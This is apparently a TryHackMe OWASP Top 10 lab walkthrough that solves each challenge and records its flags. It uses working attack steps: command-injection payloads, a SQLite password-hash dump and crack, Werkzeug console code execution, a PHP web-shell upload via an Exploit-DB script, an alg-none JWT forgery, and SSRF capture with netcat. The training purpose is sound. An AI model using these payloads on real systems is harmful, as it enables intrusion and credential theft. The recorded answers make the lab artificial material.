[THM] OWASP Top 10 (2021)

What is OWASP?

The Open Web Application Security Project, or OWASP, is an international non-profit organization dedicated to web application security. One of OWASP’s core principles is that all of their materials be freely available and easily accessible on their website, making it possible for anyone to improve their own web application security.

What is OWASP Top 10?

The OWASP Top 10 is a regularly-updated report outlining security concerns for web application security, focusing on the 10 most critical risks.

1. Broken Access Control
2. Cryptographic Failures
3. Injection
4. Insecure Design
5. Security Misconfiguration
6. Vulnerable and Outdated Components
7. Identification and Authentication Failures
8. Software and Data Integrity Failures
9. Security Logging & Monitoring Failures
10. Server-Side Request Forgery (SSRF)

1. Broken Access Control

Websites usually have pages that are protected from regular visitors. For example, only the site’s admin user should be able to access a page to manage other users. If a website visitor can access protected pages they are not meant to see, then the access controls are broken.

Broken Access Control (IDOR Challenge)

IDOR or Insecure Direct Object Reference refers to an access control vulnerability where you can access resources you wouldn’t normally be able to see. This occurs when the programmer exposes a Direct Object Reference, which is just an identifier that refers to specific objects within the server. By object, it can refer to a file, a user, a bank account in a banking application, or anything.

Deploy the machine and go to http://MACHINE_IP - login with the username noot and the password test1234.

flag{fivefourthree}

http://10.10.255.211/note.php?note_id=0

changed the id in the url from 1 to 0 and revealed the flag.

2. Cryptographic Failures

A cryptographic failure refers to any vulnerability arising from the misuse of cryptographic alogrithms for protecting sensitive information. Web applications require cryptography to provide confidentiality for their users at many levels.

Cryptographic Failures (Challenge)

Have a look around the web app. The developer has left themselves a note indicating that there is sensitive data in a specific directory.

What is the name of the mentioned directory?

/assets

Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

webapp.db

Use the supporting material to access the sensitive data. What is the password hash of the admin user?

6eea9b7ef19179a06954edd0f6c05ceb

 1┌──(kali㉿kali)-[~/Downloads]
 2└─$ ls
 3webapp.db
 4
 5┌──(kali㉿kali)-[~/Downloads]
 6└─$ file webapp.db
 7webapp.db: SQLite 3.x database, last written using SQLite version 3022000, file counter 255, database pages 7, 1st free page 5, free pages 1, cookie 0x6, schema 4, UTF-8, version-valid-for 255
 8
 9┌──(kali㉿kali)-[~/Downloads]
10└─$ sqlite3 webapp.db
11SQLite version 3.44.2 2023-11-24 11:41:44
12Enter ".help" for usage hints.
13sqlite> .tables
14sessions  users
15sqlite> PRAGMA table_info(users);
160|userID|TEXT|1||1
171|username|TEXT|1||0
182|password|TEXT|1||0
193|admin|INT|1||0
20sqlite> SELECT * FROM users;
214413096d9c933359b898b6202288a650|admin|6eea9b7ef19179a06954edd0f6c05ceb|1
2223023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
234e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0

Crack the hash. What is the admin’s plaintext password?

qwertyuiop

Login as the admin. What is the flag?

THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

3. Injection

Injection flaws occur because the application interprets user-controlled input as commands or parameters.

Some common examples:

• SQL Injection
• Command Injection

The main defence for preventing injection attacks is ensuring that user-controlled input is not interpreted as queries or commands.

• Allow list: checks input by comparing it to a list of safe inputs. If the input is marked as safe, then it is processed. Otherwise, it’s rejected.
• Stripping input: If the input contains dangerous characters, these are removed before processing.

Command Injection

Command Injection occurs when server-side code in a web app makes a call to a function that interacts with the server’s console directly. An Injection web vulnerability allows an attacker to take advantage of that call to execute operating system commands arbitrarily on the server.

What strange text file is in the website’s root directory?

drpepper.txt

How many non-root/non-service/non-daemon users are there?

0

In order to find users in Linux, we can use the following command: cat /etc/passwd.

However, there are so many users in the output. We are only interested in non-root/non-service/non-daemon users.

We need to remember that Linux-based systems have two types of users: system and normal users.

• system users are entities created by the system to run non-interactive processes, the processes that run in the background and do not require human interaction.
• normal users are human users created by root or another user with root privileges.

Both system and normal users in Linux have a Unique User ID (UID) to identify them.

• System users have UIDs in the range from 0 (root user) to 999.
• Normal users typically receive UIDs from 1000 onwards

I researched further to understand /etc/passwd file fields.

arrow #3 represents the UID. From the output of our commands cat /etc/passwd, I found only one user that has UID higher than 1000. That is, nobody. However, I learned that the user ’nobody’ is a reserved user created by the system. Therefore, the answer to the question is actually 0.

What user is this app running as?

apache

In order to find the current user, we can run the following command: $(whoami)

What is the user’s shell set as?

/sbin/nologin

$(cat /etc/passwd) command we saw above shows that user apache’s shell at the very bottom.

What version of Alpine Linux is running?

3.16.0

The hint of the question tells us that the version can be found in /etc/alpine-release.

4. Insecure Design

Insecure design refers to vulnerabilities that are inherent to the application’s architecture. They are not vulnerabilities regarding bad implementations or configurations, but the idea behind the whole application (or part of it) is falwed from the start.

Navigate to http://10.10.118.28:85 and get into joseph’s account. This application also has a design flaw in its password reset mechanism. Can you figure out the weakness in the proposed design and how to abuse it?

Try to reset joseph’s password. keep in mind the method used by the site to validate if you are indeed joseph.

What is the value of the flag in joseph’s account?

THM{Not_3ven_c4tz_c0uld_sav3_U!}

One of the security questions was very easy to guess, and there was no limit on password attempts, which is an insecure design.

5. Security Misconfiguration

Security Misconfigurations occur when security could have been appropriately configured but was not. Even if you download the latest up-to-date software, poor configurations could make your installation vulnerable.

Security misconfigurations include:

• Poorly configured permissions on cloud services, like S3 buckets.
• Having unnecessary features enabled, like services, pages, accounts or privileges.
• Default accounts with unchanged passwords.
• Error messages that are overly detailed and allow attackers to find out more about the system.
• Not using HTTP security headers.

Navigate to http://10.10.118.28:86/console to access the Werkzeug console.

Use the Werkzeug console to run the following Python code to execute the ls -l command on the server: import os; print(os.popen("ls -l").read())

What is the database file name (the one with the .db extension) in the current directory?

todo.db

Modify the code to read the contents of the app.py file, which contains the application’s source code. What is the value of the secret_flag variable in the source code?

THM{Just_a_tiny_misconfiguration}

6. Vulnerable and Outdated Components

Occasionally, you may find that the company/entity you’re pen-testing is using a program with a well-known vulnerability. It requires very little work to exploit its vulnerability because the vulnerability is already well-known. If a company misses a single update for a program they use, it could be vulnerable to any number of attacks.

Navigate to http://10.10.118.28:84 where you’ll find a vulnerable application. All the information you need to exploit it can be found online.

What is the content of the /opt/flag.txt file?

THM{But_1ts_n0t_my_f4ult!}

At the very top, the website clearly specifies that the site is built with PHP, MYSQL (procedure functions), and Bootstrap.

I googled procedure functions bootstrap exploit and the first result directs to Exploit-DB, clearly indicating we may be onto something!

I downloaded the exploit and ran it

 1┌──(kali㉿kali)-[~/Downloads]
 2└─$ ls
 347887.py  webapp.db
 4
 5┌──(kali㉿kali)-[~/Downloads]
 6└─$ python 47887.py
 7usage: 47887.py [-h] url
 847887.py: error: the following arguments are required: url
 9
10┌──(kali㉿kali)-[~/Downloads]
11└─$ python 47887.py http://10.10.118.28:84
12> Attempting to upload PHP web shell...
13> Verifying shell upload...
14> Web shell uploaded to http://10.10.118.28:84/bootstrap/img/KJvupFii50.php
15> Example command usage: http://10.10.118.28:84/bootstrap/img/KJvupFii50.php?cmd=whoami
16> Do you wish to launch a shell here? (y/n): y
17RCE $ cat /opt/flag.txt
18THM{But_1ts_n0t_my_f4ult!}

7. Identification and Authentication Failures

Authentication and session management constitute core components of modern web applications. Authentication allows users to gain access to web applications by verifying their identities. The most common form of authentication is using a username and password. If a user enters correct credentials, the server would provide ther users’ browser with a session cookie. A session cookie is needed because web servers use HTTP(S) to communicate, which is stateless. Attaching session cookies means the server will know who is sending what data. The server can then keep track of user’s actions.

Some common flaws in authentication mechanisms:

• Brute force attacks
• Use of weak credentials
• Weak Session Cookies

Some mitigation for broekn authentication mechanisms:

• Enforce a strong password policy
• Enforce an automatic lockout after a certain number of attempts
• Implement Multi-Factor Authentication

Many times, what happens is that developers forget to sanitize the input given by the user in the code of their application. We will focus on a vulnerability that happens because of a developer’s mistake but is very easy to exploit, re-registration

Go to http://10.10.118.28:8088 and try to register with darren as your username. You’ll see that the user already exists, so try to register darren (whitespace at the start) instead, and you’ll see that you are now logged in and can see the content present only in darren’s account, which in our case, is the flag that you need to retrieve.

What is the flag that you found in darren’s account?

fe86079416a21a3c99937fea8874b667

Now try to do the same trick and see if you can log in as arthur

d9ac0f7db4fda460ac3edeb75d75e16e

8. Software and Data Integrity Failures

What is Integrity?

When talking about integrity, we refer to the capacity we have to ascertain that a piece of data remains unmodified. Integrity is essential in cybersecurity as we care about maintaining important data free from unwanted or malicious modifications. A hash is generally mentioned as a solution for ensuring data integrity.

What is the SHA-256 hash of https://code.jquery.com/jquery-1.12.4.min.js?

sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=

When a user logs into an application, they will be assigned some sort of session token that will need to be saved on the browser. This token will be repeated on each subsequent request to identify who we are. These session token can come in many forms but are usually assigned via cookies.

Cookies are key-value pairs that a web application will store on the user’s browser and that will be automatically repeated on each request to the website that issued them. This could be a terrible idea security-wise because, cookies are stored on the user’s browser, so if the user tampers with the cookie, they could potentially impersonate someone else. The application would suffer from a data integrity failure.

One solution to this is use some integry mechanisms to guarantee that cookie hasn’t been altered by the user. One popular option is JSON Web Tokens (JWT)

JWTs are very simple tokens that allow you to store key-value pairs on a token that provides integrity as part of the token. The idea is that you can generate tokens that you can give your users with the certainty that they won’t be able to alter the key-value pairs and pass the integrity check.

JWT token is formed of 3 parts: Header, Payload and Signature.

A data integrity failure vulnerability was present on some libraries implementing JWTs a while ago. The vulnerable libraries allowed attackers to bypass the signature validation by changing the two following things in a JWT:

1. Modify the header section of the token so that the alg header would contain the value none.
2. Remove the signature part.

Try logging into the application as guest. What is guest’s account password?

guest

If your login was successful, you should now have a JWT stored as a cookie in your browser. Press F12 to bring out the Developer Tools.

What is the name of the website’s cookie containing a JWT token?

jwt-session

Use the knowledge gained in this task to modify the JWT toekn so that the application thinks you are the user “admin”.

What is the flag presented to the admin user?

THM{Dont_take_cookies_from_strangers}

original token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzE5ODk1NzI0fQ.KY3A8a6eVrLrqFt606eVjfMLYLGTRtZAwthimwQO5Lo

We learned that the JWT token is formed of 3 parts.

• Header: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9
• Payload: eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzE5ODk1NzI0fQ
• Signature: KY3A8a6eVrLrqFt606eVjfMLYLGTRtZAwthimwQO5Lo

Now we can use the encode/decode online tool to modify the contents of the header and remove signature.

First decode the Header part of the token

Modify the alg value to none

Decode the Payload part of the token

Modify the value of the username to admin

Remove Signature and combine those modified parts

• Header_modified: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0

• Payload_modified: eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzE5ODk1NzI0fQ

• Combined_token_modified: eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNzE5ODk1NzI0fQ.

Notice that I still kept the dot at then end even though we removed the signature part of the token.

Replace the value of the cookie to our modified token and refresh the page

9. Security Logging and Monitoring Failures

When web applications are set up, every action performed by the user should be logged. Logging is important because if an incident occurs, the attackers’ activites can be traced. Once their actions are traced, their risk and impact can be determined.

The information stored in logs should include the following:

• HTTP status codes
• Time Stamps
• Usernames
• API endpoints/page locations
• IP addresses

These logs have sensitive information so it’s important to ensure that they are stored securely and that multiple copies of these logs are stored at different locations.

 1200 OK           12.55.22.88 jr22          2019-03-18T09:21:17 /login
 2200 OK           14.56.23.11 rand99        2019-03-18T10:19:22 /login
 3200 OK           17.33.10.38 afer11        2019-03-18T11:11:44 /login
 4200 OK           99.12.44.20 rad4          2019-03-18T11:55:51 /login
 5200 OK           67.34.22.10 bff1          2019-03-18T13:08:59 /login
 6200 OK           34.55.11.14 hax0r         2019-03-21T16:08:15 /login
 7401 Unauthorised 49.99.13.16 admin         2019-03-21T21:08:15 /login
 8401 Unauthorised 49.99.13.16 administrator 2019-03-21T21:08:20 /login
 9401 Unauthorised 49.99.13.16 anonymous     2019-03-21T21:08:25 /login
10401 Unauthorised 49.99.13.16 root          2019-03-21T21:08:30 /login

What IP address is the attacker using?

49.99.13.16

What kind of attack is being carried out?

brute force

10. Server-Side Request Forgery (SSRF)

This type of vulnerability occurs when an attacker coerce a web application into sending requests on their behalf to arbitrary destinations while having control of the contents of the request itself. SSRF vulnerabilities often arise from implementations where our web applicatio nneeds to use third-party services.

Navigate to http://MACHINE_IP, where you’ll find a simple web application. After exploring a bit, you should see an admin area, which will be our main objective. Follow the instructions on the following questions to gain access to the website’s restricted area!

Explore the website. What is the only host allowed to access the admin area?

localhost

Check the “Download Resume” button. Where does the server parameter point to?

secure-file-storage.com

Using SSRF, make the application send the request to your AttackBox instead of the secure file storage. Are there any API keys in the intercepted request?

THM{Hello_Im_just_an_API_key}

replace secure-file-storage.com part with your own AttackBox IP address and run nc -lvp 8087 command.

 1┌──(kali㉿kali)-[~/Desktop]
 2└─$ nc -lvp 8087
 3listening on [any] 8087 ...
 410.10.245.216: inverse host lookup failed: Unknown host
 5connect to [10.6.67.243] from (UNKNOWN) [10.10.245.216] 34718
 6GET /public-docs-k057230990384293/75482342.pdf HTTP/1.1
 7Host: 10.6.67.243:8087
 8User-Agent: PycURL/7.45.1 libcurl/7.83.1 OpenSSL/1.1.1q zlib/1.2.12 brotli/1.0.9 nghttp2/1.47.0
 9Accept: */*
10X-API-KEY: THM{Hello_Im_just_an_API_key}